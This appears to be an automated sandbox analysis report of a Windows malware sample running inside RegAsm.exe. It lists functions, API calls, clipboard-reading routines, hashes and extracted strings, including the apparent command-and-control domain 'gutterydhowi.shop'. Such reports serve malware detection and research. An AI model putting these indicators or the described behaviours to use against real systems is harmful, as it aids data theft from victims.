
API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: a0d4b658af6bd46268db0595c72e2438b3ee795bee09955795362e3c4bf965e6
Instruction ID: e3fa0247554c5ffb03f323f1ecbb87424c2972ba6cb038164e8f032144f104d6
Opcode Fuzzy Hash: a0d4b658af6bd46268db0595c72e2438b3ee795bee09955795362e3c4bf965e6
Instruction Fuzzy Hash: AA2127B1D002599FDB10DFAAC884ADEFBF5FF48314F10841AE959A7250C7795900CFA5

Analysis Process: RegAsm.exePID: 5344, Parent PID: 6392COMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	61.9%
Total number of Nodes:	155
Total number of Limit Nodes:	23

Executed Functions

Function 004404AB Relevance: 21.6, APIs: 9, Strings: 3, Instructions: 644
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 0044050C
SysAllocString.OLEAUT32 ref: 004405CC
VariantInit.OLEAUT32(080B0A0D), ref: 00440658

Strings

4`[b, xrefs: 00440DA0
4`[b, xrefs: 00440C00
<],[, xrefs: 00440531

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocString$InitVariant
String ID: 4`[b$4`[b$<],[
API String ID: 3074814690-2254285042
Opcode ID: 0ea8b8889e0bb4a45b6034501902803b8855704a2f451e5abac1be5342d0fdbe
Instruction ID: 3b70daff5964ce097363bec6f93c74fecd6cdfee96da66d185794e42f4892200
Opcode Fuzzy Hash: 0ea8b8889e0bb4a45b6034501902803b8855704a2f451e5abac1be5342d0fdbe
Instruction Fuzzy Hash: 6022CA756083409FE714DF28D880B2FBBE1FF85309F14882DE6858B2A1D739E955CB5A

Function 00412450 Relevance: 13.2, APIs: 4, Strings: 3, Instructions: 916
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 0041254E
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00412570
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0041289E

Strings

25A2D0757F90F419EC62ECD0B10FDE23, xrefs: 00412583
gutterydhowi.shop, xrefs: 00412858, 004132B8
q-s, xrefs: 00412746

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Initialize$DirectorySecuritySystem
String ID: 25A2D0757F90F419EC62ECD0B10FDE23$gutterydhowi.shop$q-s
API String ID: 1379780170-1544957592
Opcode ID: 574801d40f12a725b9c9cb71e3c2e1c5558239a08317548fb3447c718f303320
Instruction ID: e90c699da80fdbf97deba592771adfca9ffecd6f7c132f23d46d425fcbc939e9
Opcode Fuzzy Hash: 574801d40f12a725b9c9cb71e3c2e1c5558239a08317548fb3447c718f303320
Instruction Fuzzy Hash: AA62D0B45007419FD3219F26D481627BBF1FF06308F14495DE4DA8BBA2D33AE896CB99

Function 004408E6 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 348
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantClear.OLEAUT32(00000008), ref: 004408F3
SysFreeString.OLEAUT32(?), ref: 00440920
SysFreeString.OLEAUT32(?), ref: 00440929
SysFreeString.OLEAUT32(?), ref: 00440940
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,571B4917,00000000,00000000,00000000,00000000), ref: 00440979

Strings

4`[b, xrefs: 00440DA0
4`[b, xrefs: 00440C00

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FreeString$ClearInformationVariantVolume
String ID: 4`[b$4`[b
API String ID: 1909038640-3640500014
Opcode ID: e385970683e39f11de06317a4428018e5c6c996f516a19f857f1be5293d116c9
Instruction ID: 09d7fc534b87bbdf8393991c9ef56cf577bcdd1ce3a6edc29adcf294396d53e5
Opcode Fuzzy Hash: e385970683e39f11de06317a4428018e5c6c996f516a19f857f1be5293d116c9
Instruction Fuzzy Hash: CFB1CF756083009FE710DF64E891B2FB7E5EB8530AF14883DE685CB252D739E815CB5A

Function 0040D470 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 153
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetInputState.USER32 ref: 0040D481
GetCurrentThreadId.KERNEL32 ref: 0040D496
GetCurrentProcessId.KERNEL32 ref: 0040D49C
ExitProcess.KERNEL32 ref: 0040D650

Strings

mlon, xrefs: 0040D5EE
qpsr, xrefs: 0040D613, 0040D61B

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CurrentProcess$ExitInputStateThread
String ID: mlon$qpsr
API String ID: 1029096631-2320206279
Opcode ID: 7930aff37ba72ce8264af3c29ed56ea6ce6d8b229feb210a3e04cfecf3ed9881
Instruction ID: 0b5985bc83f50576ef1f085b5a0d62e7e6efba06dbaf663de6811bcd9dd79fdb
Opcode Fuzzy Hash: 7930aff37ba72ce8264af3c29ed56ea6ce6d8b229feb210a3e04cfecf3ed9881
Instruction Fuzzy Hash: 7D416C7480C240ABD301BFA8D544A1EFBE5EF56705F148C2EE4C4A7392C23AC818CB6B

Function 00447AC9 Relevance: 5.3, Strings: 4, Instructions: 253
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

{D, xrefs: 00447BCE
}D, xrefs: 00447D03
%sgh, xrefs: 00447B40
4`[b, xrefs: 00447CE0

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: }D$%sgh$4`[b${D
API String ID: 0-1200795032
Opcode ID: c656611d13eb9998dea93ad7650dcc7234f5517edaf0b7581130130a8e452fc2
Instruction ID: e9ff087d7b6ba292c07e2a373faf3cf3d0a9800b043d4ee0ae862f7c510f9595
Opcode Fuzzy Hash: c656611d13eb9998dea93ad7650dcc7234f5517edaf0b7581130130a8e452fc2
Instruction Fuzzy Hash: 05817A7060C3419FE710EF28D890A2EBBE5EB99315F148C6DF1C597262C739E891CB1A

Function 004402A0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(0044ECE0,00000000,00000001,0044ECD0,00000000), ref: 004403C3

Strings

\, xrefs: 0044036A

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateInstance
String ID: \
API String ID: 542301482-2967466578
Opcode ID: 55ca5ea74327c37230005dd96f40ed117402dd6aaa728eb66733fef909f1fa8b
Instruction ID: b06662f8561df98ad2529b26f2048e1b14c1b8c328a58212780cbbaa33de0264
Opcode Fuzzy Hash: 55ca5ea74327c37230005dd96f40ed117402dd6aaa728eb66733fef909f1fa8b
Instruction Fuzzy Hash: 493132B0068344EAE7108F15D885B0BBBE4BB82759F10091DF6C85A3A1C7B5D949CBAB

Function 0040F042 Relevance: 1.5, Strings: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

gutterydhowi.shop, xrefs: 0040F35B

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: gutterydhowi.shop
API String ID: 0-3708922491
Opcode ID: ca4472624897f6057df6c8ffb23683dd2a6b038d4d54d03cf02992a55fdc48f7
Instruction ID: ef9271f13a37813059f82d7b2aef6f9b9132d2b5a11f53dfc547668204b89559
Opcode Fuzzy Hash: ca4472624897f6057df6c8ffb23683dd2a6b038d4d54d03cf02992a55fdc48f7
Instruction Fuzzy Hash: 6CA17DB6C14214DFDB109FA0EC915BEBBB1FB0A309F04047AE805BB362E7759914CB69

Function 004476D0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0044B41F,?,00000004,?,?,00000018,?), ref: 004476FE

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 00447E1B Relevance: 1.3, Strings: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 00447E85

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: eb829c1958d12e7b797e221f414fdc189eda3203ecedf078b9ad9c73e332691c
Instruction ID: cdf6f297f13441fe2925969da6b6994966f8396d0ae99224b9e918e95d5920a6
Opcode Fuzzy Hash: eb829c1958d12e7b797e221f414fdc189eda3203ecedf078b9ad9c73e332691c
Instruction Fuzzy Hash: 9B31A97180C3018BE714DF28C89072BB7F1EF95305F44596EF8C9A72A1E7399845CB9A

Function 00447D38 Relevance: .5, Instructions: 487COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e817c690497e3a4022a77811021909d7a50f1b1157406970a08b9050210e2fa
Instruction ID: 8bcc6fb386cb15c142638edae28a52624d13c148528c1f92ba7a2a6e1e143af4
Opcode Fuzzy Hash: 9e817c690497e3a4022a77811021909d7a50f1b1157406970a08b9050210e2fa
Instruction Fuzzy Hash: A7021036A08341CFD700DF28E89052EB7E1FB89312F194A7EE49487392D735E955CB86

Function 00444490 Relevance: 1.6, APIs: 1, Instructions: 62
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(4B6A4902,00000000), ref: 00444530

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 7303358f5359f19ca23f0687a22b433efaff00f6e34e09b9e2f94b9ea2ceaedc
Instruction ID: caa5a61c1fc6514fa69d27dc7abdf64d4e2d01bb00e12b800d78490065dd5173
Opcode Fuzzy Hash: 7303358f5359f19ca23f0687a22b433efaff00f6e34e09b9e2f94b9ea2ceaedc
Instruction Fuzzy Hash: 5A01803550C240DFD210AB18ED80A1ABBF8EF8A716F054868E5C48B252C335EC50DB6A

Function 004403D5 Relevance: 1.5, APIs: 1, Instructions: 47
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 0044044C

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: 9b0a8c760725dab51bb07f8fe1f7641837ddde63911a500a21b14bce7a5731d5
Instruction ID: e00fa1a8639580132ef1711e3684ec2b9ae092d3da14727c041d79fce7bdfa61
Opcode Fuzzy Hash: 9b0a8c760725dab51bb07f8fe1f7641837ddde63911a500a21b14bce7a5731d5
Instruction Fuzzy Hash: F711EEB4118341ABE340CF55D884A1FBBF4BB8A399F50991CF5C8AB262C338D9558F5A

Function 00440487 Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00440499

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 51e336faa6c2fcf0526d47f5133575ed9351b5fc03324903f609139a39d83779
Instruction ID: 9f20bccf4d9f2d96555a164169547896cadea5661c106c8d5462967b84e22707
Opcode Fuzzy Hash: 51e336faa6c2fcf0526d47f5133575ed9351b5fc03324903f609139a39d83779
Instruction Fuzzy Hash: 34D002343D4301BAF2310B54AC17F157554A746F02F200025B7517C0E1C9E1A6519A1D

Non-executed Functions

Function 0041E71A Relevance: 30.0, Strings: 23, Instructions: 1251COMMON

Download Yara Rule

Strings

dgfi, xrefs: 0041F114
HIFG, xrefs: 0041EF47
4523, xrefs: 0041EF26
01NO, xrefs: 0041EF31
@A^_, xrefs: 0041EF5D
PQno, xrefs: 0041EF89
!>?, xrefs: 0041EF05
xyvw, xrefs: 0041EFCB
HKJM, xrefs: 0041F177
<=:;, xrefs: 0041EF10
\]Z[, xrefs: 0041EF68
(qM, xrefs: 0041F109
x{z}, xrefs: 0041F0F3
z%, xrefs: 0041F11F
LMJK, xrefs: 0041EF3C
ONIH, xrefs: 0041F02E
0, xrefs: 0041F04F
,-*+, xrefs: 0041EEE4
DEBC, xrefs: 0041EF52
turs, xrefs: 0041EFD6
[ZED, xrefs: 0041F00D
()&', xrefs: 0041EEEF
XYVW, xrefs: 0041EF73

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: !>?$ z%$()&'$(qM$,-*+$0$01NO$4523$<=:;$@A^_$DEBC$HIFG$HKJM$LMJK$ONIH$PQno$XYVW$[ZED$\]Z[$dgfi$turs$xyvw$x{z}
API String ID: 0-2038966068
Opcode ID: 6fb4cebedaccea11462cfd2a12e62bc392f0dfae58938a905a7cddfeef1e6118
Instruction ID: dd8c9a11170efe247047064befbb3e8e17caaf51c98d00186aa99d3ab3198a48
Opcode Fuzzy Hash: 6fb4cebedaccea11462cfd2a12e62bc392f0dfae58938a905a7cddfeef1e6118
Instruction Fuzzy Hash: F2A2ABB55083819FD730CF11D884BEBBBE1AFC5304F54492EE9C88B251DB399885CB9A

Function 00439BD0 Relevance: 29.8, APIs: 6, Strings: 11, Instructions: 99clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00439BE0
GetWindowLongW.USER32 ref: 00439C05
GetClipboardData.USER32 ref: 00439C15
GlobalLock.KERNEL32 ref: 00439C2E
GlobalUnlock.KERNEL32 ref: 00439D1C
CloseClipboard.USER32 ref: 00439D25

Strings

|, xrefs: 00439C84
u, xrefs: 00439C7F
F, xrefs: 00439C70
{, xrefs: 00439C66
s, xrefs: 00439C6B
}, xrefs: 00439C61
G, xrefs: 00439C7A
z, xrefs: 00439C75
H, xrefs: 00439C98
N, xrefs: 00439C8E
S, xrefs: 00439C93

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: F$G$H$N$S$s$u$z${$|$}
API String ID: 2832541153-1941974359
Opcode ID: c2f3d5519ab13067e96e8a8e1554d226321cbd2039ebb6754a01b94ca404930a
Instruction ID: 1a35188d04eb71108be36436a893f0745e74d17b360d7727ff600e0e31ba3cd0
Opcode Fuzzy Hash: c2f3d5519ab13067e96e8a8e1554d226321cbd2039ebb6754a01b94ca404930a
Instruction Fuzzy Hash: B341617150C3808ED301EF78D48831FBFE0AB96318F05596EE4DA86292D6BD8949C79B

Function 00429978 Relevance: 24.3, Strings: 19, Instructions: 551COMMON

Download Yara Rule

Strings

#!, xrefs: 0042A2FE
Q%e', xrefs: 00429A8B
31, xrefs: 0042A2D2
n)l+, xrefs: 00429A96
9), xrefs: 0042A4F2
sAuC, xrefs: 0042A004
[Y, xrefs: 004299E6
TW, xrefs: 0042A6BA
37, xrefs: 00429DCB
MI, xrefs: 004299F1
53, xrefs: 0042A4FD
O=|?, xrefs: 00429ACD
/-, xrefs: 0042A2F3
sq, xrefs: 0042A222
<&, xrefs: 0042A4E7
`a, xrefs: 00429B37
<:, xrefs: 00429DC0
75, xrefs: 0042A2DD
.,, xrefs: 00429DB5

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: .,$37$53$9)$<&$<:$MI$O=|?$Q%e'$TW$[Y$`a$n)l+$sAuC$#!$/-$31$75$sq
API String ID: 0-518734598
Opcode ID: b3b08317d2e0cfa541fc023eb25e697968bc4af5299184a1130a56b36b739f48
Instruction ID: 03ea407fed1d32f28916693174b9482451e2888c3307ff2ead53aff0a4ec171c
Opcode Fuzzy Hash: b3b08317d2e0cfa541fc023eb25e697968bc4af5299184a1130a56b36b739f48
Instruction Fuzzy Hash: D362D6B55093828AE3748F01E680BDFBBF1BB96344F90892DE5D89B241DB748449CF97

Function 00432830 Relevance: 18.6, APIs: 1, Strings: 9, Instructions: 1081COMMON

Download Yara Rule

Strings

vT^:, xrefs: 00433623
#6C, xrefs: 004332B4, 00433344
VVOT, xrefs: 00432C91
,"@, xrefs: 004328D4
::, xrefs: 00433158
[X^", xrefs: 00433726
xdaa, xrefs: 004328F2
SQ, xrefs: 00433825
%W U, xrefs: 0043382F

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: ,"@$#6C$%W U$::$VVOT$[X^"$vT^:$xdaa$SQ
API String ID: 0-3977809258
Opcode ID: 687946c3e46dcd2fef14dd3dc931c1ff83cc1edd7a341014e5edc793b6e60020
Instruction ID: 6a30e320bc9aa03169a315c8e403c78acd1a2c3e87340e59c740f6ce2ae395c4
Opcode Fuzzy Hash: 687946c3e46dcd2fef14dd3dc931c1ff83cc1edd7a341014e5edc793b6e60020
Instruction Fuzzy Hash: 06827A70405B818AE7318F25C590BA3BBF0AF1B306F14189ED4EB9B293D739A545CF69

Function 00434990 Relevance: 14.8, APIs: 2, Strings: 6, Instructions: 824COMMON

Download Yara Rule

Strings

$8r?, xrefs: 00434DA9
, xrefs: 004349C8
nLv(, xrefs: 00434D9F
, xrefs: 004349E3
u}|, xrefs: 00434EAE
--',, xrefs: 00435299

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: $ $$8r?$--',$nLv($u}|
API String ID: 0-457197051
Opcode ID: 89f28bd8366341feae83dd6fb5c22f02944d18e81172c0eac4edd031de949ed1
Instruction ID: 8b41d4da4bcd42269ea7739c650f07c77f5b2283e083b4b23c58f1815274c948
Opcode Fuzzy Hash: 89f28bd8366341feae83dd6fb5c22f02944d18e81172c0eac4edd031de949ed1
Instruction Fuzzy Hash: 9352CF70504B418BE7258F35C494BA7BBE1AF4A305F14886EE5EB8B392CB3AF405CB55

Function 004338C0 Relevance: 11.7, APIs: 1, Strings: 5, Instructions: 1246COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 004339D4

Strings

?*$2, xrefs: 0043413A
CIBH, xrefs: 004348CB
)FC, xrefs: 00433FD1, 004341EA, 004341F0
{vry, xrefs: 00433B15
drG, xrefs: 00433CE5

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: drG$)FC$?*$2$CIBH${vry
API String ID: 3664257935-1492907507
Opcode ID: 76d7692e372014387e47a71721219990899b7678fcf2bf8cf459b591c2ce3725
Instruction ID: ae17b6820417c1f5d865f6f8db41105b67f97988771920ed6e8cdea7b43e7d9c
Opcode Fuzzy Hash: 76d7692e372014387e47a71721219990899b7678fcf2bf8cf459b591c2ce3725
Instruction Fuzzy Hash: 87A28B70405B818AE7328F35C590BE3BBF1AF1A305F04589ED4EA9B282DB3AB545CB55

Function 00401000 Relevance: 10.7, Strings: 7, Instructions: 1914COMMON

Download Yara Rule

Strings

A, xrefs: 0040144A
gfff, xrefs: 004021E6
0123456789ABCDEFXP, xrefs: 00401445, 004014B3
-, xrefs: 00402196
0123456789abcdefxp, xrefs: 00401451, 004014C3
gfff, xrefs: 00402249
gfff, xrefs: 0040228F

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$A$gfff$gfff$gfff
API String ID: 0-947532036
Opcode ID: e06ab667e6b9483aab09583229f0419af3f4093797c2ed4d09b53c95b9789ffe
Instruction ID: 21de5e691bd859abbc2be4e82a4dcaafefefd4727c911ae8c5553d0c2646aee4
Opcode Fuzzy Hash: e06ab667e6b9483aab09583229f0419af3f4093797c2ed4d09b53c95b9789ffe
Instruction Fuzzy Hash: 4EE2D2716083418FD714CF29C49476BBBE2ABC9314F188A3EE895A73D1D379DA05CB86

Function 0040FA20 Relevance: 6.6, Strings: 5, Instructions: 380COMMON

Download Yara Rule

Strings

v{, xrefs: 0040FB42
~, xrefs: 0040FC4F
{3, xrefs: 0040FB32
0ALx9as21P0wgnMaAwgr5eEZBUx4ljqDx7xZ1jR49JI-1727448433-0.0.1.1-/api, xrefs: 0040FEA7, 0040FEC4
J<BJ, xrefs: 0040FD7D

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 0ALx9as21P0wgnMaAwgr5eEZBUx4ljqDx7xZ1jR49JI-1727448433-0.0.1.1-/api$J<BJ$v{${3$~
API String ID: 0-4147522767
Opcode ID: 76f2aed4a057638f363fd031f3dbe0569a69028984208c497ec39f2097cc7ed5
Instruction ID: 4e670058078cea7fd43884a886fc8be73a26d202e8482742903b49392826d215
Opcode Fuzzy Hash: 76f2aed4a057638f363fd031f3dbe0569a69028984208c497ec39f2097cc7ed5
Instruction Fuzzy Hash: 53D1687050C3818BD321DF18C49062EBBE1AF92744F54093EE5D1AB7A2D339D949CBAB

Function 0043A777 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 0043A7B1
GetSystemMetrics.USER32 ref: 0043A7C0

Strings

, xrefs: 0043A86B

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 6d15c560a22f2f746b61e91c69fede85cce94a29c4e560c9bab8bff2291995dd
Instruction ID: 04cec409040a24a7638083f5cbef6eeda66da4d91f8b2fb747c19da65d0b6118
Opcode Fuzzy Hash: 6d15c560a22f2f746b61e91c69fede85cce94a29c4e560c9bab8bff2291995dd
Instruction Fuzzy Hash: 62319FB49182009FDB00EF68D98565EBBF0BB89304F11853EE898D7360D774A959CF86

Function 00433623 Relevance: 5.2, Strings: 4, Instructions: 178COMMON

Download Yara Rule

Strings

vT^:, xrefs: 00433623
#6C, xrefs: 004332B4, 00433344
VVOT, xrefs: 00432C91
,"@, xrefs: 004328D4
::, xrefs: 00433158
[X^", xrefs: 00433726
xdaa, xrefs: 004328F2
SQ, xrefs: 00433825
%W U, xrefs: 0043382F

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: ,"@$#6C$%W U$::$VVOT$[X^"$vT^:$xdaa$SQ
API String ID: 0-3977809258
Opcode ID: 5316a4421e8038fc09d359bae9942a20de967b06b3305538db8130970f2136b8
Instruction ID: 47a7bdd0108c2fb9dd8588cd9d3ff781ee98881393f00aa1a63237223b76b1bc
Opcode Fuzzy Hash: 5316a4421e8038fc09d359bae9942a20de967b06b3305538db8130970f2136b8
Instruction Fuzzy Hash: 4A615B70005B808AE7718F34C494BE7BBE0BF1A306F44589ED4EA9B292DB3AA505CF55

Function 0041FFD8 Relevance: 4.2, Strings: 3, Instructions: 450COMMON

Download Yara Rule

Strings

4`[b, xrefs: 004205F0
D, xrefs: 0042031C
4`[b, xrefs: 00420540

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 4`[b$4`[b$D
API String ID: 0-2855741908
Opcode ID: a7e3d1d7ca71022d09922b4ef272221b09d855bf3f0e3213e81620edfcfd55d1
Instruction ID: 31d3bb4f6c8ef88d8f7c367f3412f89acc0e11c248f3c087f24487996a868f02
Opcode Fuzzy Hash: a7e3d1d7ca71022d09922b4ef272221b09d855bf3f0e3213e81620edfcfd55d1
Instruction Fuzzy Hash: 5DE1BBB0608381DFD720CF24E895BABB7E2FF85305F54496EE4889B352D3799850CB5A

Function 00427230 Relevance: 4.2, Strings: 3, Instructions: 429COMMON

Download Yara Rule

Strings

4`[b, xrefs: 00427680
`cb], xrefs: 0042745A
hi, xrefs: 00427252

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 4`[b$`cb]$hi
API String ID: 0-188674353
Opcode ID: 7c7ddaada45d9b960d0eaf75562d5b09a578a319d4a1213e9501c45daf7a36b6
Instruction ID: e8b149cf807d1c003d5c69b0e71323098e2fb5bb7a12dbfc9662ce51d29e78b9
Opcode Fuzzy Hash: 7c7ddaada45d9b960d0eaf75562d5b09a578a319d4a1213e9501c45daf7a36b6
Instruction Fuzzy Hash: FDC1BE7160C3209BD710EF18E881A2BB7E4EF96354F84095EF8C597351E339E954C7AA

Function 00420A70 Relevance: 4.1, Strings: 3, Instructions: 397COMMON

Download Yara Rule

Strings

M"C, xrefs: 00420D07
|}, xrefs: 00420C9D
IO, xrefs: 00420D00

Memory Dump Source

Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: |}$IO$M"C
API String ID: 0-2140647755
